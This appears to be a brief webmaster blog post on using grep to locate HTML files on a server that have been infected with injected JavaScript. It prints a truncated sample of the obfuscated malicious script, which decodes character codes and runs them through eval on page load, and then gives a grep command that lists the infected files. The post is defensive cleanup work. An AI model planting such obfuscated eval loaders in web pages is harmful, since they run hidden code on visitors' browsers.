Find hacked files with grep

Using grep to find hacked files on a website should be quick and easy and give you a nice list of files that all have the hacked code to the pages.

I ran across a server that have javascript injected in a bunch of their HTML pages. I was able to find a part of the javascript unique to the compromised code:

 <!--0c0896--><script type="text/javascript" language="javascript">
bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["\x62o"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5e,6a,68,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c................................4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1327!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script><!--/0c0896-->

Running the following command, I was able to get a list of all files containing the string "ff=String.fromCharCode;w=window;z=":

# grep -Rl "ff=String.fromCharCode;w=window;z=" /var/www/vhosts/exampledomain.com/httpdocs/
/var/www/vhosts/exampledomain.com/httpdocs/index.html
/var/www/vhosts/exampledomain.com/httpdocs/info.html
/var/www/vhosts/exampledomain.com/httpdocs/folder1/index.html
/var/www/vhosts/exampledomain.com/httpdocs/folder1/contactus.html
....
...

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *